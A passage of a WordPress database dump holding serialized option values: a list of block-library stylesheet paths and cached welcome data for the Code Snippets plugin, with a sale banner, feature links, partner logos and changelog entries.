.min.css\";i:26;s:16:\"audio/editor.css\";i:27;s:20:\"audio/editor.min.css\";i:28;s:19:\"audio/style-rtl.css\";i:29;s:23:\"audio/style-rtl.min.css\";i:30;s:15:\"audio/style.css\";i:31;s:19:\"audio/style.min.css\";i:32;s:19:\"audio/theme-rtl.css\";i:33;s:23:\"audio/theme-rtl.min.css\";i:34;s:15:\"audio/theme.css\";i:35;s:19:\"audio/theme.min.css\";i:36;s:21:\"avatar/editor-rtl.css\";i:37;s:25:\"avatar/editor-rtl.min.css\";i:38;s:17:\"avatar/editor.css\";i:39;s:21:\"avatar/editor.min.css\";i:40;s:20:\"avatar/style-rtl.css\";i:41;s:24:\"avatar/style-rtl.min.css\";i:42;s:16:\"avatar/style.css\";i:43;s:20:\"avatar/style.min.css\";i:44;s:21:\"button/editor-rtl.css\";i:45;s:25:\"button/editor-rtl.min.css\";i:46;s:17:\"button/editor.css\";i:47;s:21:\"button/editor.min.css\";i:48;s:20:\"button/style-rtl.css\";i:49;s:24:\"button/style-rtl.min.css\";i:50;s:16:\"button/style.css\";i:51;s:20:\"button/style.min.css\";i:52;s:22:\"buttons/editor-rtl.css\";i:53;s:26:\"buttons/editor-rtl.min.css\";i:54;s:18:\"buttons/editor.css\";i:55;s:22:\"buttons/editor.min.css\";i:56;s:21:\"buttons/style-rtl.css\";i:57;s:25:\"buttons/style-rtl.min.css\";i:58;s:17:\"buttons/style.css\";i:59;s:21:\"buttons/style.min.css\";i:60;s:22:\"calendar/style-rtl.css\";i:61;s:26:\"calendar/style-rtl.min.css\";i:62;s:18:\"calendar/style.css\";i:63;s:22:\"calendar/style.min.css\";i:64;s:25:\"categories/editor-rtl.css\";i:65;s:29:\"categories/editor-rtl.min.css\";i:66;s:21:\"categories/editor.css\";i:67;s:25:\"categories/editor.min.css\";i:68;s:24:\"categories/style-rtl.css\";i:69;s:28:\"categories/style-rtl.min.css\";i:70;s:20:\"categories/style.css\";i:71;s:24:\"categories/style.min.css\";i:72;s:19:\"code/editor-rtl.css\";i:73;s:23:\"code/editor-rtl.min.css\";i:74;s:15:\"code/editor.css\";i:75;s:19:\"code/editor.min.css\";i:76;s:18:\"code/style-rtl.css\";i:77;s:22:\"code/style-rtl.min.css\";i:78;s:14:\"code/style.css\";i:79;s:18:\"code/style.min.css\";i:80;s:18:\"code/theme-rtl.css\";i:81;s:22:\"code/theme-rtl.min.css\";i:82;s:14:\"code/theme.css\";i:83;s:18:\"code/theme.min.css\";i:84;s:22:\"columns/editor-rtl.css\";i:85;s:26:\"columns/editor-rtl.min.css\";i:86;s:18:\"columns/editor.css\";i:87;s:22:\"columns/editor.min.css\";i:88;s:21:\"columns/style-rtl.css\";i:89;s:25:\"columns/style-rtl.min.css\";i:90;s:17:\"columns/style.css\";i:91;s:21:\"columns/style.min.css\";i:92;s:33:\"comment-author-name/style-rtl.css\";i:93;s:37:\"comment-author-name/style-rtl.min.css\";i:94;s:29:\"comment-author-name/style.css\";i:95;s:33:\"comment-author-name/style.min.css\";i:96;s:29:\"comment-content/style-rtl.css\";i:97;s:33:\"comment-content/style-rtl.min.css\";i:98;s:25:\"comment-content/style.css\";i:99;s:29:\"comment-content/style.min.css\";i:100;s:26:\"comment-date/style-rtl.css\";i:101;s:30:\"comment-date/style-rtl.min.css\";i:102;s:22:\"comment-date/style.css\";i:103;s:26:\"comment-date/style.min.css\";i:104;s:31:\"comment-edit-link/style-rtl.css\";i:105;s:35:\"comment-edit-link/style-rtl.min.css\";i:106;s:27:\"comment-edit-link/style.css\";i:107;s:31:\"comment-edit-link/style.min.css\";i:108;s:32:\"comment-reply-link/style-rtl.css\";i:109;s:36:\"comment-reply-link/style-rtl.min.css\";i:110;s:28:\"comment-reply-link/style.css\";i:111;s:32:\"comment-reply-link/style.min.css\";i:112;s:30:\"comment-template/style-rtl.css\";i:113;s:34:\"comment-template/style-rtl.min.css\";i:114;s:26:\"comment-template/style.css\";i:115;s:30:\"comment-template/style.min.css\";i:116;s:42:\"comments-pagination-numbers/editor-rtl.css\";i:117;s:46:\"comments-pagination-numbers/editor-rtl.min.css\";i:118;s:38:\"comments-pagination-numbers/editor.css\";i:119;s:42:\"comments-pagination-numbers/editor.min.css\";i:120;s:34:\"comments-pagination/editor-rtl.css\";i:121;s:38:\"comments-pagination/editor-rtl.min.css\";i:122;s:30:\"comments-pagination/editor.css\";i:123;s:34:\"comments-pagination/editor.min.css\";i:124;s:33:\"comments-pagination/style-rtl.css\";i:125;s:37:\"comments-pagination/style-rtl.min.css\";i:126;s:29:\"comments-pagination/style.css\";i:127;s:33:\"comments-pagination/style.min.css\";i:128;s:29:\"comments-title/editor-rtl.css\";i:129;s:33:\"comments-title/editor-rtl.min.css\";i:130;s:25:\"comments-title/editor.css\";i:131;s:29:\"comments-title/editor.min.css\";i:132;s:23:\"comments/editor-rtl.css\";i:133;s:27:\"comments/editor-rtl.min.css\";i:134;s:19:\"comments/editor.css\";i:135;s:23:\"comments/editor.min.css\";i:136;s:22:\"comments/style-rtl.css\";i:137;s:26:\"comments/style-rtl.min.css\";i:138;s:18:\"comments/style.css\";i:139;s:22:\"comments/style.min.css\";i:140;s:20:\"cover/editor-rtl.css\";i:141;s:24:\"cover/editor-rtl.min.css\";i:142;s:16:\"cover/editor.css\";i:143;s:20:\"cover/editor.min.css\";i:144;s:19:\"cover/style-rtl.css\";i:145;s:23:\"cover/style-rtl.min.css\";i:146;s:15:\"cover/style.css\";i:147;s:19:\"cover/style.min.css\";i:148;s:22:\"details/editor-rtl.css\";i:149;s:26:\"details/editor-rtl.min.css\";i:150;s:18:\"details/editor.css\";i:151;s:22:\"details/editor.min.css\";i:152;s:21:\"details/style-rtl.css\";i:153;s:25:\"details/style-rtl.min.css\";i:154;s:17:\"details/style.css\";i:155;s:21:\"details/style.min.css\";i:156;s:20:\"embed/editor-rtl.css\";i:157;s:24:\"embed/editor-rtl.min.css\";i:158;s:16:\"embed/editor.css\";i:159;s:20:\"embed/editor.min.css\";i:160;s:19:\"embed/style-rtl.css\";i:161;s:23:\"embed/style-rtl.min.css\";i:162;s:15:\"embed/style.css\";i:163;s:19:\"embed/style.min.css\";i:164;s:19:\"embed/theme-rtl.css\";i:165;s:23:\"embed/theme-rtl.min.css\";i:166;s:15:\"embed/theme.css\";i:167;s:19:\"embed/theme.min.css\";i:168;s:19:\"file/editor-rtl.css\";i:169;s:23:\"file/editor-rtl.min.css\";i:170;s:15:\"file/editor.css\";i:171;s:19:\"file/editor.min.css\";i:172;s:18:\"file/style-rtl.css\";i:173;s:22:\"file/style-rtl.min.css\";i:174;s:14:\"file/style.css\";i:175;s:18:\"file/style.min.css\";i:176;s:23:\"footnotes/style-rtl.css\";i:177;s:27:\"footnotes/style-rtl.min.css\";i:178;s:19:\"footnotes/style.css\";i:179;s:23:\"footnotes/style.min.css\";i:180;s:23:\"freeform/editor-rtl.css\";i:181;s:27:\"freeform/editor-rtl.min.css\";i:182;s:19:\"freeform/editor.css\";i:183;s:23:\"freeform/editor.min.css\";i:184;s:22:\"gallery/editor-rtl.css\";i:185;s:26:\"gallery/editor-rtl.min.css\";i:186;s:18:\"gallery/editor.css\";i:187;s:22:\"gallery/editor.min.css\";i:188;s:21:\"gallery/style-rtl.css\";i:189;s:25:\"gallery/style-rtl.min.css\";i:190;s:17:\"gallery/style.css\";i:191;s:21:\"gallery/style.min.css\";i:192;s:21:\"gallery/theme-rtl.css\";i:193;s:25:\"gallery/theme-rtl.min.css\";i:194;s:17:\"gallery/theme.css\";i:195;s:21:\"gallery/theme.min.css\";i:196;s:20:\"group/editor-rtl.css\";i:197;s:24:\"group/editor-rtl.min.css\";i:198;s:16:\"group/editor.css\";i:199;s:20:\"group/editor.min.css\";i:200;s:19:\"group/style-rtl.css\";i:201;s:23:\"group/style-rtl.min.css\";i:202;s:15:\"group/style.css\";i:203;s:19:\"group/style.min.css\";i:204;s:19:\"group/theme-rtl.css\";i:205;s:23:\"group/theme-rtl.min.css\";i:206;s:15:\"group/theme.css\";i:207;s:19:\"group/theme.min.css\";i:208;s:21:\"heading/style-rtl.css\";i:209;s:25:\"heading/style-rtl.min.css\";i:210;s:17:\"heading/style.css\";i:211;s:21:\"heading/style.min.css\";i:212;s:19:\"html/editor-rtl.css\";i:213;s:23:\"html/editor-rtl.min.css\";i:214;s:15:\"html/editor.css\";i:215;s:19:\"html/editor.min.css\";i:216;s:20:\"image/editor-rtl.css\";i:217;s:24:\"image/editor-rtl.min.css\";i:218;s:16:\"image/editor.css\";i:219;s:20:\"image/editor.min.css\";i:220;s:19:\"image/style-rtl.css\";i:221;s:23:\"image/style-rtl.min.css\";i:222;s:15:\"image/style.css\";i:223;s:19:\"image/style.min.css\";i:224;s:19:\"image/theme-rtl.css\";i:225;s:23:\"image/theme-rtl.min.css\";i:226;s:15:\"image/theme.css\";i:227;s:19:\"image/theme.min.css\";i:228;s:29:\"latest-comments/style-rtl.css\";i:229;s:33:\"latest-comments/style-rtl.min.css\";i:230;s:25:\"latest-comments/style.css\";i:231;s:29:\"latest-comments/style.min.css\";i:232;s:27:\"latest-posts/editor-rtl.css\";i:233;s:31:\"latest-posts/editor-rtl.min.css\";i:234;s:23:\"latest-posts/editor.css\";i:235;s:27:\"latest-posts/editor.min.css\";i:236;s:26:\"latest-posts/style-rtl.css\";i:237;s:30:\"latest-posts/style-rtl.min.css\";i:238;s:22:\"latest-posts/style.css\";i:239;s:26:\"latest-posts/style.min.css\";i:240;s:18:\"list/style-rtl.css\";i:241;s:22:\"list/style-rtl.min.css\";i:242;s:14:\"list/style.css\";i:243;s:18:\"list/style.min.css\";i:244;s:22:\"loginout/style-rtl.css\";i:245;s:26:\"loginout/style-rtl.min.css\";i:246;s:18:\"loginout/style.css\";i:247;s:22:\"loginout/style.min.css\";i:248;s:19:\"math/editor-rtl.css\";i:249;s:23:\"math/editor-rtl.min.css\";i:250;s:15:\"math/editor.css\";i:251;s:19:\"math/editor.min.css\";i:252;s:18:\"math/style-rtl.css\";i:253;s:22:\"math/style-rtl.min.css\";i:254;s:14:\"math/style.css\";i:255;s:18:\"math/style.min.css\";i:256;s:25:\"media-text/editor-rtl.css\";i:257;s:29:\"media-text/editor-rtl.min.css\";i:258;s:21:\"media-text/editor.css\";i:259;s:25:\"media-text/editor.min.css\";i:260;s:24:\"media-text/style-rtl.css\";i:261;s:28:\"media-text/style-rtl.min.css\";i:262;s:20:\"media-text/style.css\";i:263;s:24:\"media-text/style.min.css\";i:264;s:19:\"more/editor-rtl.css\";i:265;s:23:\"more/editor-rtl.min.css\";i:266;s:15:\"more/editor.css\";i:267;s:19:\"more/editor.min.css\";i:268;s:30:\"navigation-link/editor-rtl.css\";i:269;s:34:\"navigation-link/editor-rtl.min.css\";i:270;s:26:\"navigation-link/editor.css\";i:271;s:30:\"navigation-link/editor.min.css\";i:272;s:29:\"navigation-link/style-rtl.css\";i:273;s:33:\"navigation-link/style-rtl.min.css\";i:274;s:25:\"navigation-link/style.css\";i:275;s:29:\"navigation-link/style.min.css\";i:276;s:33:\"navigation-submenu/editor-rtl.css\";i:277;s:37:\"navigation-submenu/editor-rtl.min.css\";i:278;s:29:\"navigation-submenu/editor.css\";i:279;s:33:\"navigation-submenu/editor.min.css\";i:280;s:25:\"navigation/editor-rtl.css\";i:281;s:29:\"navigation/editor-rtl.min.css\";i:282;s:21:\"navigation/editor.css\";i:283;s:25:\"navigation/editor.min.css\";i:284;s:24:\"navigation/style-rtl.css\";i:285;s:28:\"navigation/style-rtl.min.css\";i:286;s:20:\"navigation/style.css\";i:287;s:24:\"navigation/style.min.css\";i:288;s:23:\"nextpage/editor-rtl.css\";i:289;s:27:\"nextpage/editor-rtl.min.css\";i:290;s:19:\"nextpage/editor.css\";i:291;s:23:\"nextpage/editor.min.css\";i:292;s:24:\"page-list/editor-rtl.css\";i:293;s:28:\"page-list/editor-rtl.min.css\";i:294;s:20:\"page-list/editor.css\";i:295;s:24:\"page-list/editor.min.css\";i:296;s:23:\"page-list/style-rtl.css\";i:297;s:27:\"page-list/style-rtl.min.css\";i:298;s:19:\"page-list/style.css\";i:299;s:23:\"page-list/style.min.css\";i:300;s:24:\"paragraph/editor-rtl.css\";i:301;s:28:\"paragraph/editor-rtl.min.css\";i:302;s:20:\"paragraph/editor.css\";i:303;s:24:\"paragraph/editor.min.css\";i:304;s:23:\"paragraph/style-rtl.css\";i:305;s:27:\"paragraph/style-rtl.min.css\";i:306;s:19:\"paragraph/style.css\";i:307;s:23:\"paragraph/style.min.css\";i:308;s:35:\"post-author-biography/style-rtl.css\";i:309;s:39:\"post-author-biography/style-rtl.min.css\";i:310;s:31:\"post-author-biography/style.css\";i:311;s:35:\"post-author-biography/style.min.css\";i:312;s:30:\"post-author-name/style-rtl.css\";i:313;s:34:\"post-author-name/style-rtl.min.css\";i:314;s:26:\"post-author-name/style.css\";i:315;s:30:\"post-author-name/style.min.css\";i:316;s:25:\"post-author/style-rtl.css\";i:317;s:29:\"post-author/style-rtl.min.css\";i:318;s:21:\"post-author/style.css\";i:319;s:25:\"post-author/style.min.css\";i:320;s:33:\"post-comments-count/style-rtl.css\";i:321;s:37:\"post-comments-count/style-rtl.min.css\";i:322;s:29:\"post-comments-count/style.css\";i:323;s:33:\"post-comments-count/style.min.css\";i:324;s:33:\"post-comments-form/editor-rtl.css\";i:325;s:37:\"post-comments-form/editor-rtl.min.css\";i:326;s:29:\"post-comments-form/editor.css\";i:327;s:33:\"post-comments-form/editor.min.css\";i:328;s:32:\"post-comments-form/style-rtl.css\";i:329;s:36:\"post-comments-form/style-rtl.min.css\";i:330;s:28:\"post-comments-form/style.css\";i:331;s:32:\"post-comments-form/style.min.css\";i:332;s:32:\"post-comments-link/style-rtl.css\";i:333;s:36:\"post-comments-link/style-rtl.min.css\";i:334;s:28:\"post-comments-link/style.css\";i:335;s:32:\"post-comments-link/style.min.css\";i:336;s:26:\"post-content/style-rtl.css\";i:337;s:30:\"post-content/style-rtl.min.css\";i:338;s:22:\"post-content/style.css\";i:339;s:26:\"post-content/style.min.css\";i:340;s:23:\"post-date/style-rtl.css\";i:341;s:27:\"post-date/style-rtl.min.css\";i:342;s:19:\"post-date/style.css\";i:343;s:23:\"post-date/style.min.css\";i:344;s:27:\"post-excerpt/editor-rtl.css\";i:345;s:31:\"post-excerpt/editor-rtl.min.css\";i:346;s:23:\"post-excerpt/editor.css\";i:347;s:27:\"post-excerpt/editor.min.css\";i:348;s:26:\"post-excerpt/style-rtl.css\";i:349;s:30:\"post-excerpt/style-rtl.min.css\";i:350;s:22:\"post-excerpt/style.css\";i:351;s:26:\"post-excerpt/style.min.css\";i:352;s:34:\"post-featured-image/editor-rtl.css\";i:353;s:38:\"post-featured-image/editor-rtl.min.css\";i:354;s:30:\"post-featured-image/editor.css\";i:355;s:34:\"post-featured-image/editor.min.css\";i:356;s:33:\"post-featured-image/style-rtl.css\";i:357;s:37:\"post-featured-image/style-rtl.min.css\";i:358;s:29:\"post-featured-image/style.css\";i:359;s:33:\"post-featured-image/style.min.css\";i:360;s:34:\"post-navigation-link/style-rtl.css\";i:361;s:38:\"post-navigation-link/style-rtl.min.css\";i:362;s:30:\"post-navigation-link/style.css\";i:363;s:34:\"post-navigation-link/style.min.css\";i:364;s:27:\"post-template/style-rtl.css\";i:365;s:31:\"post-template/style-rtl.min.css\";i:366;s:23:\"post-template/style.css\";i:367;s:27:\"post-template/style.min.css\";i:368;s:24:\"post-terms/style-rtl.css\";i:369;s:28:\"post-terms/style-rtl.min.css\";i:370;s:20:\"post-terms/style.css\";i:371;s:24:\"post-terms/style.min.css\";i:372;s:31:\"post-time-to-read/style-rtl.css\";i:373;s:35:\"post-time-to-read/style-rtl.min.css\";i:374;s:27:\"post-time-to-read/style.css\";i:375;s:31:\"post-time-to-read/style.min.css\";i:376;s:24:\"post-title/style-rtl.css\";i:377;s:28:\"post-title/style-rtl.min.css\";i:378;s:20:\"post-title/style.css\";i:379;s:24:\"post-title/style.min.css\";i:380;s:26:\"preformatted/style-rtl.css\";i:381;s:30:\"preformatted/style-rtl.min.css\";i:382;s:22:\"preformatted/style.css\";i:383;s:26:\"preformatted/style.min.css\";i:384;s:24:\"pullquote/editor-rtl.css\";i:385;s:28:\"pullquote/editor-rtl.min.css\";i:386;s:20:\"pullquote/editor.css\";i:387;s:24:\"pullquote/editor.min.css\";i:388;s:23:\"pullquote/style-rtl.css\";i:389;s:27:\"pullquote/style-rtl.min.css\";i:390;s:19:\"pullquote/style.css\";i:391;s:23:\"pullquote/style.min.css\";i:392;s:23:\"pullquote/theme-rtl.css\";i:393;s:27:\"pullquote/theme-rtl.min.css\";i:394;s:19:\"pullquote/theme.css\";i:395;s:23:\"pullquote/theme.min.css\";i:396;s:39:\"query-pagination-numbers/editor-rtl.css\";i:397;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:398;s:35:\"query-pagination-numbers/editor.css\";i:399;s:39:\"query-pagination-numbers/editor.min.css\";i:400;s:31:\"query-pagination/editor-rtl.css\";i:401;s:35:\"query-pagination/editor-rtl.min.css\";i:402;s:27:\"query-pagination/editor.css\";i:403;s:31:\"query-pagination/editor.min.css\";i:404;s:30:\"query-pagination/style-rtl.css\";i:405;s:34:\"query-pagination/style-rtl.min.css\";i:406;s:26:\"query-pagination/style.css\";i:407;s:30:\"query-pagination/style.min.css\";i:408;s:25:\"query-title/style-rtl.css\";i:409;s:29:\"query-title/style-rtl.min.css\";i:410;s:21:\"query-title/style.css\";i:411;s:25:\"query-title/style.min.css\";i:412;s:25:\"query-total/style-rtl.css\";i:413;s:29:\"query-total/style-rtl.min.css\";i:414;s:21:\"query-total/style.css\";i:415;s:25:\"query-total/style.min.css\";i:416;s:20:\"query/editor-rtl.css\";i:417;s:24:\"query/editor-rtl.min.css\";i:418;s:16:\"query/editor.css\";i:419;s:20:\"query/editor.min.css\";i:420;s:19:\"quote/style-rtl.css\";i:421;s:23:\"quote/style-rtl.min.css\";i:422;s:15:\"quote/style.css\";i:423;s:19:\"quote/style.min.css\";i:424;s:19:\"quote/theme-rtl.css\";i:425;s:23:\"quote/theme-rtl.min.css\";i:426;s:15:\"quote/theme.css\";i:427;s:19:\"quote/theme.min.css\";i:428;s:23:\"read-more/style-rtl.css\";i:429;s:27:\"read-more/style-rtl.min.css\";i:430;s:19:\"read-more/style.css\";i:431;s:23:\"read-more/style.min.css\";i:432;s:18:\"rss/editor-rtl.css\";i:433;s:22:\"rss/editor-rtl.min.css\";i:434;s:14:\"rss/editor.css\";i:435;s:18:\"rss/editor.min.css\";i:436;s:17:\"rss/style-rtl.css\";i:437;s:21:\"rss/style-rtl.min.css\";i:438;s:13:\"rss/style.css\";i:439;s:17:\"rss/style.min.css\";i:440;s:21:\"search/editor-rtl.css\";i:441;s:25:\"search/editor-rtl.min.css\";i:442;s:17:\"search/editor.css\";i:443;s:21:\"search/editor.min.css\";i:444;s:20:\"search/style-rtl.css\";i:445;s:24:\"search/style-rtl.min.css\";i:446;s:16:\"search/style.css\";i:447;s:20:\"search/style.min.css\";i:448;s:20:\"search/theme-rtl.css\";i:449;s:24:\"search/theme-rtl.min.css\";i:450;s:16:\"search/theme.css\";i:451;s:20:\"search/theme.min.css\";i:452;s:24:\"separator/editor-rtl.css\";i:453;s:28:\"separator/editor-rtl.min.css\";i:454;s:20:\"separator/editor.css\";i:455;s:24:\"separator/editor.min.css\";i:456;s:23:\"separator/style-rtl.css\";i:457;s:27:\"separator/style-rtl.min.css\";i:458;s:19:\"separator/style.css\";i:459;s:23:\"separator/style.min.css\";i:460;s:23:\"separator/theme-rtl.css\";i:461;s:27:\"separator/theme-rtl.min.css\";i:462;s:19:\"separator/theme.css\";i:463;s:23:\"separator/theme.min.css\";i:464;s:24:\"shortcode/editor-rtl.css\";i:465;s:28:\"shortcode/editor-rtl.min.css\";i:466;s:20:\"shortcode/editor.css\";i:467;s:24:\"shortcode/editor.min.css\";i:468;s:24:\"site-logo/editor-rtl.css\";i:469;s:28:\"site-logo/editor-rtl.min.css\";i:470;s:20:\"site-logo/editor.css\";i:471;s:24:\"site-logo/editor.min.css\";i:472;s:23:\"site-logo/style-rtl.css\";i:473;s:27:\"site-logo/style-rtl.min.css\";i:474;s:19:\"site-logo/style.css\";i:475;s:23:\"site-logo/style.min.css\";i:476;s:27:\"site-tagline/editor-rtl.css\";i:477;s:31:\"site-tagline/editor-rtl.min.css\";i:478;s:23:\"site-tagline/editor.css\";i:479;s:27:\"site-tagline/editor.min.css\";i:480;s:26:\"site-tagline/style-rtl.css\";i:481;s:30:\"site-tagline/style-rtl.min.css\";i:482;s:22:\"site-tagline/style.css\";i:483;s:26:\"site-tagline/style.min.css\";i:484;s:25:\"site-title/editor-rtl.css\";i:485;s:29:\"site-title/editor-rtl.min.css\";i:486;s:21:\"site-title/editor.css\";i:487;s:25:\"site-title/editor.min.css\";i:488;s:24:\"site-title/style-rtl.css\";i:489;s:28:\"site-title/style-rtl.min.css\";i:490;s:20:\"site-title/style.css\";i:491;s:24:\"site-title/style.min.css\";i:492;s:26:\"social-link/editor-rtl.css\";i:493;s:30:\"social-link/editor-rtl.min.css\";i:494;s:22:\"social-link/editor.css\";i:495;s:26:\"social-link/editor.min.css\";i:496;s:27:\"social-links/editor-rtl.css\";i:497;s:31:\"social-links/editor-rtl.min.css\";i:498;s:23:\"social-links/editor.css\";i:499;s:27:\"social-links/editor.min.css\";i:500;s:26:\"social-links/style-rtl.css\";i:501;s:30:\"social-links/style-rtl.min.css\";i:502;s:22:\"social-links/style.css\";i:503;s:26:\"social-links/style.min.css\";i:504;s:21:\"spacer/editor-rtl.css\";i:505;s:25:\"spacer/editor-rtl.min.css\";i:506;s:17:\"spacer/editor.css\";i:507;s:21:\"spacer/editor.min.css\";i:508;s:20:\"spacer/style-rtl.css\";i:509;s:24:\"spacer/style-rtl.min.css\";i:510;s:16:\"spacer/style.css\";i:511;s:20:\"spacer/style.min.css\";i:512;s:20:\"table/editor-rtl.css\";i:513;s:24:\"table/editor-rtl.min.css\";i:514;s:16:\"table/editor.css\";i:515;s:20:\"table/editor.min.css\";i:516;s:19:\"table/style-rtl.css\";i:517;s:23:\"table/style-rtl.min.css\";i:518;s:15:\"table/style.css\";i:519;s:19:\"table/style.min.css\";i:520;s:19:\"table/theme-rtl.css\";i:521;s:23:\"table/theme-rtl.min.css\";i:522;s:15:\"table/theme.css\";i:523;s:19:\"table/theme.min.css\";i:524;s:24:\"tag-cloud/editor-rtl.css\";i:525;s:28:\"tag-cloud/editor-rtl.min.css\";i:526;s:20:\"tag-cloud/editor.css\";i:527;s:24:\"tag-cloud/editor.min.css\";i:528;s:23:\"tag-cloud/style-rtl.css\";i:529;s:27:\"tag-cloud/style-rtl.min.css\";i:530;s:19:\"tag-cloud/style.css\";i:531;s:23:\"tag-cloud/style.min.css\";i:532;s:28:\"template-part/editor-rtl.css\";i:533;s:32:\"template-part/editor-rtl.min.css\";i:534;s:24:\"template-part/editor.css\";i:535;s:28:\"template-part/editor.min.css\";i:536;s:27:\"template-part/theme-rtl.css\";i:537;s:31:\"template-part/theme-rtl.min.css\";i:538;s:23:\"template-part/theme.css\";i:539;s:27:\"template-part/theme.min.css\";i:540;s:24:\"term-count/style-rtl.css\";i:541;s:28:\"term-count/style-rtl.min.css\";i:542;s:20:\"term-count/style.css\";i:543;s:24:\"term-count/style.min.css\";i:544;s:30:\"term-description/style-rtl.css\";i:545;s:34:\"term-description/style-rtl.min.css\";i:546;s:26:\"term-description/style.css\";i:547;s:30:\"term-description/style.min.css\";i:548;s:23:\"term-name/style-rtl.css\";i:549;s:27:\"term-name/style-rtl.min.css\";i:550;s:19:\"term-name/style.css\";i:551;s:23:\"term-name/style.min.css\";i:552;s:28:\"term-template/editor-rtl.css\";i:553;s:32:\"term-template/editor-rtl.min.css\";i:554;s:24:\"term-template/editor.css\";i:555;s:28:\"term-template/editor.min.css\";i:556;s:27:\"term-template/style-rtl.css\";i:557;s:31:\"term-template/style-rtl.min.css\";i:558;s:23:\"term-template/style.css\";i:559;s:27:\"term-template/style.min.css\";i:560;s:27:\"text-columns/editor-rtl.css\";i:561;s:31:\"text-columns/editor-rtl.min.css\";i:562;s:23:\"text-columns/editor.css\";i:563;s:27:\"text-columns/editor.min.css\";i:564;s:26:\"text-columns/style-rtl.css\";i:565;s:30:\"text-columns/style-rtl.min.css\";i:566;s:22:\"text-columns/style.css\";i:567;s:26:\"text-columns/style.min.css\";i:568;s:19:\"verse/style-rtl.css\";i:569;s:23:\"verse/style-rtl.min.css\";i:570;s:15:\"verse/style.css\";i:571;s:19:\"verse/style.min.css\";i:572;s:20:\"video/editor-rtl.css\";i:573;s:24:\"video/editor-rtl.min.css\";i:574;s:16:\"video/editor.css\";i:575;s:20:\"video/editor.min.css\";i:576;s:19:\"video/style-rtl.css\";i:577;s:23:\"video/style-rtl.min.css\";i:578;s:15:\"video/style.css\";i:579;s:19:\"video/style.min.css\";i:580;s:19:\"video/theme-rtl.css\";i:581;s:23:\"video/theme-rtl.min.css\";i:582;s:15:\"video/theme.css\";i:583;s:19:\"video/theme.min.css\";}}','on'),(860466,'_transient_timeout_code_snippets_welcome_data','1765486565','off'),(860467,'_transient_code_snippets_welcome_data','a:5:{s:6:\"banner\";a:9:{s:3:\"key\";s:6:\"bf2025\";s:14:\"start_datetime\";O:17:\"DateTimeImmutable\":3:{s:4:\"date\";s:26:\"2025-11-18 00:00:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:12:\"end_datetime\";O:17:\"DateTimeImmutable\":3:{s:4:\"date\";s:26:\"2025-12-03 00:00:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:9:\"text_free\";s:63:\"Save up to 50% on Code Snippets Pro with our Black Friday Sale!\";s:15:\"action_url_free\";s:45:\"https://codesnippets.pro/pricing/?cs_user=new\";s:17:\"action_label_free\";s:8:\"Get Deal\";s:8:\"text_pro\";s:58:\"Save up to 50% on your upgrade with our Black Friday Sale!\";s:14:\"action_url_pro\";s:50:\"https://codesnippets.pro/pricing/?cs_user=existing\";s:16:\"action_label_pro\";s:8:\"Get Deal\";}s:9:\"hero-item\";a:3:{s:4:\"name\";s:24:\"Meet Snippet Conditions!\";s:10:\"follow_url\";s:78:\"https://codesnippets.pro/blog/version-3-7-snippet-conditions-official-release/\";s:9:\"image_url\";s:78:\"https://codesnippets.pro/wp-content/uploads/2025/09/conditions_screenshot.webp\";}s:8:\"features\";a:4:{i:0;a:5:{s:5:\"title\";s:28:\"Pssss... Get Secret Discount\";s:10:\"follow_url\";s:22:\"https://snipco.de/TFIG\";s:9:\"image_url\";s:81:\"https://codesnippets.pro/wp-content/uploads/2024/09/Promotions_Hero_All_Plans.png\";s:8:\"category\";s:5:\"offer\";s:11:\"description\";s:100:\"Get secret discount on all Code Snippets Pro plans. Just use coupon code \'General5\' at the checkout!\";}i:1;a:5:{s:5:\"title\";s:25:\"Add Unsplash to WordPress\";s:10:\"follow_url\";s:22:\"https://snipco.de/Mind\";s:9:\"image_url\";s:53:\"https://i3.ytimg.com/vi/kRSwWDanX0A/maxresdefault.jpg\";s:8:\"category\";s:3:\"tip\";s:11:\"description\";s:70:\"Code Snippet to Add Unsplash to WordPress - Find and Download Images..\";}i:2;a:5:{s:5:\"title\";s:30:\"Code Snippet Cloud Setup Guide\";s:10:\"follow_url\";s:22:\"https://snipco.de/Mine\";s:9:\"image_url\";s:149:\"https://cdn.getgist.com/attachment_images/76ca6cef08ca8e69ac1e7fbc15004bebbd08ad595ee67e0d7b55d1a9555354bfScreenshot%202023-11-23%20at%2000.50.02.png\";s:8:\"category\";s:5:\"guide\";s:11:\"description\";s:143:\"We have done our best to make the cloud set up as smooth and easy as possible. This guide below will walk you through the process step by step.\";}i:3;a:5:{s:5:\"title\";s:14:\"Cloud and AI +\";s:10:\"follow_url\";s:22:\"https://snipco.de/Minf\";s:9:\"image_url\";s:53:\"https://i3.ytimg.com/vi/rEOC2bIwY-w/maxresdefault.jpg\";s:8:\"category\";s:11:\"new feature\";s:11:\"description\";s:68:\"Code Snippets 3.6 Announcement - AI CodeSnippets - Generate AI Code!\";}}s:8:\"partners\";a:4:{i:0;a:3:{s:5:\"title\";s:9:\"Elementor\";s:10:\"follow_url\";s:22:\"https://snipco.de/KK3d\";s:9:\"image_url\";s:76:\"https://codesnippets.pro/wp-content/uploads/2024/05/Elementor-logo-green.png\";}i:1;a:3:{s:5:\"title\";s:7:\"InstaWP\";s:10:\"follow_url\";s:22:\"https://snipco.de/KK3n\";s:9:\"image_url\";s:68:\"https://codesnippets.pro/wp-content/uploads/2024/05/instawp-logo.png\";}i:2;a:3:{s:5:\"title\";s:11:\"Dynamic.ooo\";s:10:\"follow_url\";s:28:\"https://snipco.de/dynamicooo\";s:9:\"image_url\";s:71:\"https://codesnippets.pro/wp-content/uploads/2025/09/Dynamicooo-Logo.png\";}i:3;a:3:{s:5:\"title\";s:10:\"Crocoblock\";s:10:\"follow_url\";s:22:\"https://snipco.de/KK3l\";s:9:\"image_url\";s:71:\"https://codesnippets.pro/wp-content/uploads/2024/05/crocoblock-logo.png\";}}s:9:\"changelog\";a:4:{s:5:\"3.9.3\";a:2:{s:5:\"Added\";a:1:{s:4:\"core\";a:1:{i:0;s:124:\"end-to-end tests to verify the toggle visual state in the snippets list page, improving UI verification and test reliability\";}}s:5:\"Fixed\";a:1:{s:4:\"core\";a:2:{i:0;s:115:\"Fix missing import of common/direction in src/css/manage.scss to restore correct styling and direction-aware layout\";i:1;s:115:\"Fix toggle activation check to ensure the correct transformation value is used when detecting active/inactive 